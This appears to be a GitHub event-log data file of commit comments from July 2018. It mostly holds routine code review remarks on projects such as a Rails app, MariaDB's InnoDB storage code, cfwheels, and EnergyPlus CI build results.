{"id":"7913222039","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29582625,"position":null,"line":null,"path":null,"commit_id":"03f9f93c44700ab429d0e63e9083a00fe08d9364","created_at":"2018-07-03T15:09:51Z","updated_at":"2018-07-03T15:09:51Z","author_association":"NONE","body":"158538153-Maximum-Curve-Output-is-always-ignored-#6365 (lgu1234) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-03f9f93c44700ab429d0e63e9083a00fe08d9364-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-03T15:09:51Z"}
{"id":"7913222818","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582627,"position":1,"line":1,"path":"app/assets/javascripts/comments.coffee","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:09:59Z","updated_at":"2018-07-03T15:09:59Z","author_association":"NONE","body":"@michiosekine 不要なアセットファイルは、削除しましょう。後からクリックして、何か書いてあるのかな？と見るのは不毛だからです。"}},"created_at":"2018-07-03T15:09:59Z"}
{"id":"7913223297","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582630,"position":1,"line":1,"path":"app/assets/javascripts/conversations.coffee","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:10:03Z","updated_at":"2018-07-03T15:10:03Z","author_association":"NONE","body":"@michiosekine 不要なアセットファイルは、削除しましょう。後からクリックして、何か書いてあるのかな？と見るのは不毛だからです。"}},"created_at":"2018-07-03T15:10:03Z"}
{"id":"7913223612","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582631,"position":1,"line":1,"path":"app/assets/javascripts/events.coffee","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:10:07Z","updated_at":"2018-07-03T15:10:07Z","author_association":"NONE","body":"@michiosekine 不要なアセットファイルは、削除しましょう。後からクリックして、何か書いてあるのかな？と見るのは不毛だからです。"}},"created_at":"2018-07-03T15:10:07Z"}
{"id":"7913223962","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582632,"position":1,"line":1,"path":"app/assets/javascripts/favorite_events.coffee","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:10:10Z","updated_at":"2018-07-03T15:10:10Z","author_association":"NONE","body":"@michiosekine 不要なアセットファイルは、削除しましょう。後からクリックして、何か書いてあるのかな？と見るのは不毛だからです。"}},"created_at":"2018-07-03T15:10:10Z"}
{"id":"7913224341","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582634,"position":1,"line":1,"path":"app/assets/javascripts/messages.coffee","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:10:14Z","updated_at":"2018-07-03T15:10:14Z","author_association":"NONE","body":"@michiosekine 不要なアセットファイルは、削除しましょう。後からクリックして、何か書いてあるのかな？と見るのは不毛だからです。"}},"created_at":"2018-07-03T15:10:14Z"}
{"id":"7913224799","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582636,"position":1,"line":1,"path":"app/assets/javascripts/participant_managements.coffee","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:10:17Z","updated_at":"2018-07-03T15:10:17Z","author_association":"NONE","body":"@michiosekine 不要なアセットファイルは、削除しましょう。後からクリックして、何か書いてあるのかな？と見るのは不毛だからです。"}},"created_at":"2018-07-03T15:10:17Z"}
{"id":"7913225176","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582638,"position":1,"line":1,"path":"app/assets/javascripts/users.coffee","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:10:20Z","updated_at":"2018-07-03T15:10:20Z","author_association":"NONE","body":"@michiosekine 不要なアセットファイルは、削除しましょう。後からクリックして、何か書いてあるのかな？と見るのは不毛だからです。"}},"created_at":"2018-07-03T15:10:20Z"}
{"id":"7913226136","type":"CommitCommentEvent","actor":{"login":"andybellenie"},"repo":{"name":"cfwheels/cfwheels"},"payload":{"comment":{"id":29582639,"position":null,"line":null,"path":null,"commit_id":"883ab1191139beb310279be654988933d0df1c6e","created_at":"2018-07-03T15:10:30Z","updated_at":"2018-07-03T15:10:30Z","author_association":"CONTRIBUTOR","body":"I'm not sure that's enough. Methods in /controllers/Controller.cfc are still available in Wheels internal pages so could potentially clash.\r\n\r\nWe used to have the file /controllers/Wheels.cfc which directly extended wheels.Controller. Replacing it fixes this but maybe not best option. I wonder if there's a similar issue with models."}},"created_at":"2018-07-03T15:10:30Z"}
{"id":"7913227015","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582642,"position":2,"line":2,"path":"app/assets/stylesheets/application.css","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:10:38Z","updated_at":"2018-07-03T15:10:38Z","author_association":"NONE","body":"@michiosekine =が付いていないのはただのコメントです。削除しておいても良いと思います。"}},"created_at":"2018-07-03T15:10:38Z"}
{"id":"7913230005","type":"CommitCommentEvent","actor":{"login":"Kleshni"},"repo":{"name":"Bitmessage/PyBitmessage"},"payload":{"comment":{"id":29582652,"position":null,"line":null,"path":null,"commit_id":"799933086a0daf95c3da854530d8e8cbdc8d244d","created_at":"2018-07-03T15:11:09Z","updated_at":"2018-07-03T15:11:09Z","author_association":"NONE","body":"This `libeay32.dll` file name is used in the PyElliptic module and tested in `depends.py`, I just tried to conform to other code to not require two library versions at the same time. OpenSSL is not intsalled on Windows 7 by default, at least it's not in the system `PATH` variable, so it depends on the user, which version they would install.\r\n\r\nI guess, the most frequent use case for Windows is a pre-build binary, which includes the OpenSSL library inside."}},"created_at":"2018-07-03T15:11:09Z"}
{"id":"7913231704","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582656,"position":1,"line":1,"path":"app/assets/stylesheets/comments.scss","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:11:25Z","updated_at":"2018-07-03T15:11:25Z","author_association":"NONE","body":"@michiosekine 不要なアセットファイルは、削除しましょう。後からクリックして、何か書いてあるのかな？と見るのは不毛だからです。"}},"created_at":"2018-07-03T15:11:25Z"}
{"id":"7913232081","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582659,"position":1,"line":1,"path":"app/assets/stylesheets/conversations.scss","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:11:29Z","updated_at":"2018-07-03T15:11:29Z","author_association":"NONE","body":"@michiosekine 不要なアセットファイルは、削除しましょう。後からクリックして、何か書いてあるのかな？と見るのは不毛だからです。"}},"created_at":"2018-07-03T15:11:29Z"}
{"id":"7913234290","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582666,"position":1,"line":1,"path":"app/assets/stylesheets/favorite_events.scss","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:11:51Z","updated_at":"2018-07-03T15:11:51Z","author_association":"NONE","body":"@michiosekine 不要なアセットファイルは、削除しましょう。後からクリックして、何か書いてあるのかな？と見るのは不毛だからです。"}},"created_at":"2018-07-03T15:11:51Z"}
{"id":"7913234669","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582667,"position":1,"line":1,"path":"app/assets/stylesheets/messages.scss","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:11:55Z","updated_at":"2018-07-03T15:11:55Z","author_association":"NONE","body":"@michiosekine 不要なアセットファイルは、削除しましょう。後からクリックして、何か書いてあるのかな？と見るのは不毛だからです。"}},"created_at":"2018-07-03T15:11:55Z"}
{"id":"7913235033","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582669,"position":1,"line":1,"path":"app/assets/stylesheets/participant_managements.scss","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:11:58Z","updated_at":"2018-07-03T15:11:58Z","author_association":"NONE","body":"@michiosekine 不要なアセットファイルは、削除しましょう。後からクリックして、何か書いてあるのかな？と見るのは不毛だからです。"}},"created_at":"2018-07-03T15:11:58Z"}
{"id":"7913235444","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582670,"position":1,"line":1,"path":"app/assets/stylesheets/users.scss","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:12:02Z","updated_at":"2018-07-03T15:12:02Z","author_association":"NONE","body":"@michiosekine 不要なアセットファイルは、削除しましょう。後からクリックして、何か書いてあるのかな？と見るのは不毛だからです。"}},"created_at":"2018-07-03T15:12:02Z"}
{"id":"7913238744","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29582681,"position":30,"line":88,"path":"storage/innobase/include/row0vers.h","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T15:12:34Z","updated_at":"2018-07-03T15:12:34Z","author_association":"CONTRIBUTOR","body":"Is this really `[in]` only, or should it be `[in,out]`?"}},"created_at":"2018-07-03T15:12:34Z"}
{"id":"7913240918","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582685,"position":8,"line":8,"path":"app/controllers/application_controller.rb","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:12:56Z","updated_at":"2018-07-03T15:12:56Z","author_association":"NONE","body":"@michiosekine %i記法が便利ですよ。\r\n```\r\n%i[ :name :bitthday ]\r\n```"}},"created_at":"2018-07-03T15:12:56Z"}
{"id":"7913244667","type":"CommitCommentEvent","actor":{"login":"francescomosca-eos"},"repo":{"name":"gcancro/tbox"},"payload":{"comment":{"id":29582700,"position":null,"line":null,"path":null,"commit_id":"e96a0a3e8d3a4543ce184b3db71323352d0c0996","created_at":"2018-07-03T15:13:32Z","updated_at":"2018-07-03T15:13:32Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[Sezione] Luoghi](https://trello.com/c/LtZTJcFA/5-sezione-luoghi)"}},"created_at":"2018-07-03T15:13:32Z"}
{"id":"7913250782","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582715,"position":6,"line":6,"path":"app/controllers/events_controller.rb","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:14:29Z","updated_at":"2018-07-03T15:14:29Z","author_association":"NONE","body":"@michiosekine インデントが深いですね。"}},"created_at":"2018-07-03T15:14:29Z"}
{"id":"7913252737","type":"CommitCommentEvent","actor":{"login":"RickKimball"},"repo":{"name":"rogerclarkmelbourne/Arduino_STM32"},"payload":{"comment":{"id":29582720,"position":null,"line":null,"path":null,"commit_id":"85eb51aacb3b6ceaf1575112cd363eb9d3a4649b","created_at":"2018-07-03T15:14:47Z","updated_at":"2018-07-03T15:14:47Z","author_association":"CONTRIBUTOR","body":"@stevestrong, please provide some code illustrating this failure.\r\n\r\nThis code works just fine:\r\n```\r\n// fast io routines so digitalWrite isn't slowing the code\r\n// PC13\r\n#define SET_LED() GPIOC->regs->BSRR = 1 << 13\r\n#define CLR_LED() GPIOC->regs->BSRR = 1 << 13 << 16\r\n\r\nvoid setup() {\r\n  pinMode(LED_BUILTIN,OUTPUT);\r\n  digitalWrite(LED_BUILTIN,0);\r\n}\r\n\r\nvoid loop() {\r\n  uint32_t s;\r\n  \r\n  SET_LED();\r\n  delay(1);\r\n\r\n  CLR_LED();\r\n  delay(3);\r\n}\r\n```"}},"created_at":"2018-07-03T15:14:47Z"}
{"id":"7913254337","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582725,"position":24,"line":24,"path":"app/controllers/events_controller.rb","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:15:03Z","updated_at":"2018-07-03T15:15:03Z","author_association":"NONE","body":"@michiosekine アソシエーションが使えそうに思いました。"}},"created_at":"2018-07-03T15:15:03Z"}
{"id":"7913254346","type":"CommitCommentEvent","actor":{"login":"grimbough"},"repo":{"name":"grimbough/BiocWorkflowTools"},"payload":{"comment":{"id":29582726,"position":null,"line":null,"path":null,"commit_id":"6b9420716e19b0baab09eff12632f50c4714b82e","created_at":"2018-07-03T15:15:03Z","updated_at":"2018-07-03T15:15:03Z","author_association":"OWNER","body":"#4 "}},"created_at":"2018-07-03T15:15:03Z"}
{"id":"7913256886","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582732,"position":40,"line":40,"path":"app/controllers/events_controller.rb","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:15:27Z","updated_at":"2018-07-03T15:15:27Z","author_association":"NONE","body":"@michiosekine シンボルの方が高速なのですよね。\r\n```\r\nrender :edit\r\n```"}},"created_at":"2018-07-03T15:15:27Z"}
{"id":"7913259440","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582738,"position":61,"line":61,"path":"app/controllers/events_controller.rb","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:15:51Z","updated_at":"2018-07-03T15:15:51Z","author_association":"NONE","body":"@michiosekine 改行が多いですね。"}},"created_at":"2018-07-03T15:15:51Z"}
{"id":"7913261169","type":"CommitCommentEvent","actor":{"login":"nickdeveaux"},"repo":{"name":"nickdeveaux/inferelator_ng"},"payload":{"comment":{"id":29582743,"position":null,"line":null,"path":null,"commit_id":"a708edf74195b1ec094e4d078a0ffe7c9d5004dc","created_at":"2018-07-03T15:16:08Z","updated_at":"2018-07-03T15:16:08Z","author_association":"OWNER","body":"looks good!"}},"created_at":"2018-07-03T15:16:08Z"}
{"id":"7913263855","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582752,"position":45,"line":45,"path":"app/controllers/events_controller.rb","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:16:34Z","updated_at":"2018-07-03T15:16:34Z","author_association":"NONE","body":"@michiosekine 自分が関与するイベント以外も、削除できてしまって問題ないですか？"}},"created_at":"2018-07-03T15:16:34Z"}
{"id":"7913273393","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582782,"position":1,"line":1,"path":"app/helpers/application_helper.rb","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:18:07Z","updated_at":"2018-07-03T15:18:07Z","author_association":"NONE","body":"@michiosekine 使わないモジュールは削除しましょう。"}},"created_at":"2018-07-03T15:18:07Z"}
{"id":"7913273795","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582785,"position":1,"line":1,"path":"app/helpers/comments_helper.rb","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:18:11Z","updated_at":"2018-07-03T15:18:11Z","author_association":"NONE","body":"@michiosekine 使わないモジュールは削除しましょう。"}},"created_at":"2018-07-03T15:18:11Z"}
{"id":"7913273854","type":"CommitCommentEvent","actor":{"login":"fschaupp"},"repo":{"name":"fschaupp/DatePoll"},"payload":{"comment":{"id":29582786,"position":30,"line":21,"path":"public/sites/basic/organisation.php","commit_id":"c44d1a5444edff3adf75fe081b9703b11e0db04c","created_at":"2018-07-03T15:18:11Z","updated_at":"2018-07-03T15:18:11Z","author_association":"OWNER","body":"ah ok ^^ sind aber nicht dokumentiert :grinning: "}},"created_at":"2018-07-03T15:18:11Z"}
{"id":"7913274257","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582789,"position":1,"line":1,"path":"app/helpers/conversations_helper.rb","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:18:15Z","updated_at":"2018-07-03T15:18:15Z","author_association":"NONE","body":"@michiosekine 使わないモジュールは削除しましょう。"}},"created_at":"2018-07-03T15:18:15Z"}
{"id":"7913275603","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582797,"position":1,"line":1,"path":"app/helpers/favorite_events_helper.rb","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:18:28Z","updated_at":"2018-07-03T15:18:28Z","author_association":"NONE","body":"@michiosekine 使わないヘルパーは削除しましょう。"}},"created_at":"2018-07-03T15:18:28Z"}
{"id":"7913275971","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582798,"position":1,"line":1,"path":"app/helpers/messages_helper.rb","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:18:31Z","updated_at":"2018-07-03T15:18:31Z","author_association":"NONE","body":"@michiosekine 使わないヘルパーは削除しましょう。"}},"created_at":"2018-07-03T15:18:31Z"}
{"id":"7913276304","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582800,"position":1,"line":1,"path":"app/helpers/participant_managements_helper.rb","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:18:34Z","updated_at":"2018-07-03T15:18:34Z","author_association":"NONE","body":"@michiosekine 使わないヘルパーは削除しましょう。"}},"created_at":"2018-07-03T15:18:34Z"}
{"id":"7913276933","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582803,"position":1,"line":1,"path":"app/helpers/users_helper.rb","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:18:40Z","updated_at":"2018-07-03T15:18:40Z","author_association":"NONE","body":"@michiosekine 使わないヘルパーは削除しましょう。"}},"created_at":"2018-07-03T15:18:40Z"}
{"id":"7913281353","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582825,"position":2,"line":2,"path":"app/mailers/application_mailer.rb","commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:19:23Z","updated_at":"2018-07-03T15:19:23Z","author_association":"NONE","body":"@michiosekine 実在するドメインを使用するのは、マナー上NGですよ。\r\nhttps://dogether.com/"}},"created_at":"2018-07-03T15:19:23Z"}
{"id":"7913283506","type":"CommitCommentEvent","actor":{"login":"Kleshni"},"repo":{"name":"Bitmessage/PyBitmessage"},"payload":{"comment":{"id":29582832,"position":4,"line":15,"path":"setup.py","commit_id":"c28a4f6174419ab3d58a7c84482dcdc895182ad8","created_at":"2018-07-03T15:19:44Z","updated_at":"2018-07-03T15:19:44Z","author_association":"NONE","body":"Otherwise would upset those who like module lists in the order they are used."}},"created_at":"2018-07-03T15:19:44Z"}
{"id":"7913289055","type":"CommitCommentEvent","actor":{"login":"Jaimemosg"},"repo":{"name":"Jaimemosg/RelDists"},"payload":{"comment":{"id":29582848,"position":36,"line":230,"path":"R/OW.R","commit_id":"a5da44da77771605dcb8528188937c16d7c981b9","created_at":"2018-07-03T15:20:39Z","updated_at":"2018-07-03T15:20:39Z","author_association":"OWNER","body":"Comentar esta línea también"}},"created_at":"2018-07-03T15:20:39Z"}
{"id":"7913291473","type":"CommitCommentEvent","actor":{"login":"zhuyingshan"},"repo":{"name":"Yisaer/PhotoShareWeb"},"payload":{"comment":{"id":29582866,"position":null,"line":null,"path":null,"commit_id":"f6b5c7896bc931acb9d39d5712057411f6f7f6af","created_at":"2018-07-03T15:21:02Z","updated_at":"2018-07-03T15:21:02Z","author_association":"NONE","body":"想问一下，sql文件在哪里呢"}},"created_at":"2018-07-03T15:21:02Z"}
{"id":"7913292947","type":"CommitCommentEvent","actor":{"login":"AnorVen"},"repo":{"name":"AnorVen/geekPHP"},"payload":{"comment":{"id":29582870,"position":null,"line":null,"path":null,"commit_id":"12afaa3a05ef28d926cfd12baba7b1470b2d3207","created_at":"2018-07-03T15:21:16Z","updated_at":"2018-07-03T15:21:16Z","author_association":"OWNER","body":"ook"}},"created_at":"2018-07-03T15:21:16Z"}
{"id":"7913293378","type":"CommitCommentEvent","actor":{"login":"neokoenig"},"repo":{"name":"cfwheels/cfwheels"},"payload":{"comment":{"id":29582873,"position":null,"line":null,"path":null,"commit_id":"883ab1191139beb310279be654988933d0df1c6e","created_at":"2018-07-03T15:21:20Z","updated_at":"2018-07-03T15:21:20Z","author_association":"MEMBER","body":"Thanks Andy; I do agree... I wonder if it would be better to create a completely new component to deal with internal pages, like we do with mapper/migrator, then add what functionality we need back. Then I guess we could hijack any requests with `?controller=wheels` to there: just trying not to break existing functionality.. :("}},"created_at":"2018-07-03T15:21:20Z"}
{"id":"7913297839","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29582886,"position":12,"line":89,"path":"storage/innobase/row/row0purge.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T15:22:02Z","updated_at":"2018-07-03T15:22:02Z","author_association":"CONTRIBUTOR","body":"Only use one space before `node`. The `@param` comment should add some useful information."}},"created_at":"2018-07-03T15:22:02Z"}
{"id":"7913299702","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29582888,"position":26,"line":103,"path":"storage/innobase/row/row0purge.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T15:22:20Z","updated_at":"2018-07-03T15:22:20Z","author_association":"CONTRIBUTOR","body":"Do we really need the double zero-initialization?"}},"created_at":"2018-07-03T15:22:20Z"}
{"id":"7913301888","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"michiosekine/dogether"},"payload":{"comment":{"id":29582890,"position":null,"line":null,"path":null,"commit_id":"f6fe1ec6388e71ca5e52cb3fee7495c9bee3be4c","created_at":"2018-07-03T15:22:41Z","updated_at":"2018-07-03T15:22:41Z","author_association":"NONE","body":"@michiosekine コミットの粒度がかなり荒いため、もっと細かくコミットしましょう。「リクエストからレスポンスまで」の1回のやりとりに関連するものを編集して、1コミット。あるいは、機能実装に必要な一つのタスクを完了させて一コミット。が適切です。"}},"created_at":"2018-07-03T15:22:41Z"}
{"id":"7913303997","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29582894,"position":63,"line":270,"path":"storage/innobase/row/row0purge.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T15:23:02Z","updated_at":"2018-07-03T15:23:02Z","author_association":"CONTRIBUTOR","body":"What does `sec_mtr == NULL` really mean? It should be part of the function comment."}},"created_at":"2018-07-03T15:23:02Z"}
{"id":"7913305013","type":"CommitCommentEvent","actor":{"login":"andybellenie"},"repo":{"name":"cfwheels/cfwheels"},"payload":{"comment":{"id":29582896,"position":null,"line":null,"path":null,"commit_id":"883ab1191139beb310279be654988933d0df1c6e","created_at":"2018-07-03T15:23:12Z","updated_at":"2018-07-03T15:23:12Z","author_association":"CONTRIBUTOR","body":"I had a play around with $initControllerObject() to force it to bypass application code when params.controller='wheels' and made some progress there, but hit crashes later on. Perhaps following that though could avoid need for a whole new component"}},"created_at":"2018-07-03T15:23:12Z"}
{"id":"7913309418","type":"CommitCommentEvent","actor":{"login":"pmusiala"},"repo":{"name":"stephenkingsley/react"},"payload":{"comment":{"id":29582906,"position":7,"line":28,"path":"packages/react-dom/src/client/ReactDOMFiberOption.js","commit_id":"752acda3e66ff65c8de6bba09ab68fcde866e90a","created_at":"2018-07-03T15:23:57Z","updated_at":"2018-07-03T15:23:57Z","author_association":"NONE","body":"Consider flattening this conditional statements"}},"created_at":"2018-07-03T15:23:57Z"}
{"id":"7913311658","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29582911,"position":81,"line":288,"path":"storage/innobase/row/row0purge.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T15:24:18Z","updated_at":"2018-07-03T15:24:18Z","author_association":"CONTRIBUTOR","body":"Shouldn’t we store also `node->pcur`? Why are we assigning fields of `node->pcur` directly? Some comment about that would be good.\r\n\r\nPlease use TAB only for indentation. Now it is a mixture of TAB and some number of spaces."}},"created_at":"2018-07-03T15:24:18Z"}
{"id":"7913318895","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29582930,"position":null,"line":null,"path":null,"commit_id":"7b238a63a074b56b98a1122490f51ba0614a9349","created_at":"2018-07-03T15:25:26Z","updated_at":"2018-07-03T15:25:26Z","author_association":"COLLABORATOR","body":"Couldn't simply add the no indent option to the existing `hide-style-list` because adding `\"padding: 0\"` was leading to changes everywhere it was used, including changes like from \r\n![image](https://user-images.githubusercontent.com/28247301/42228542-3bdda06c-7eb2-11e8-857f-abb0a3c5fcf9.png)\r\nto \r\n![image](https://user-images.githubusercontent.com/28247301/42228556-417bb950-7eb2-11e8-8e9e-b8ab4cb7dcf1.png)."}},"created_at":"2018-07-03T15:25:26Z"}
{"id":"7913321536","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29582934,"position":98,"line":305,"path":"storage/innobase/row/row0purge.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T15:25:52Z","updated_at":"2018-07-03T15:25:52Z","author_association":"CONTRIBUTOR","body":"`false` can also be returned if there is no virtual column in the index.\r\nWhy should `sec_mtr=NULL` be passed to this function at all?"}},"created_at":"2018-07-03T15:25:52Z"}
{"id":"7913326400","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29582939,"position":110,"line":317,"path":"storage/innobase/row/row0purge.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T15:26:37Z","updated_at":"2018-07-03T15:26:37Z","author_association":"CONTRIBUTOR","body":"I would prefer to avoid declaring the local variable `latch_mode`. Instead, just pass\r\n`is_tree ? BTR_MODIFY_TREE | BTR_LATCH_FOR_DELETE : BTR_PURGE_LEAF`\r\nas the first parameter."}},"created_at":"2018-07-03T15:26:37Z"}
{"id":"7913328966","type":"CommitCommentEvent","actor":{"login":"ThomasGaertner"},"repo":{"name":"Courseplay/courseplay"},"payload":{"comment":{"id":29582944,"position":null,"line":null,"path":null,"commit_id":"69c7b88a3934ee3b9a46b0b414d1ce087b4e9506","created_at":"2018-07-03T15:27:01Z","updated_at":"2018-07-03T15:27:01Z","author_association":"NONE","body":"if you want to help out , you're welcome as much as you can . I will not be able to do stuff for the next time...\r\nreal life stuff .... "}},"created_at":"2018-07-03T15:27:01Z"}
{"id":"7913329680","type":"CommitCommentEvent","actor":{"login":"akoshlatyy-vareger"},"repo":{"name":"synechron-finlabs/quorum-maker"},"payload":{"comment":{"id":29582945,"position":null,"line":null,"path":null,"commit_id":"c48466c213509b0e6186f7ebe8fd1e7466dc0d19","created_at":"2018-07-03T15:27:10Z","updated_at":"2018-07-03T15:27:10Z","author_association":"NONE","body":"Hello! Why did you decide to delete configurations from the file \"template.conf\" and add this lines to `start_quorum_template.sh`?\r\nCould you create the option to add TLS encryption with \r\n`tlsservertrust = \"ca\"`\r\n`tlsclienttrust = \"ca\"`\r\nand add the possibility to provide the URL to the server instead of IP address on \r\n`Please enter IP Address of this node: ` step?"}},"created_at":"2018-07-03T15:27:10Z"}
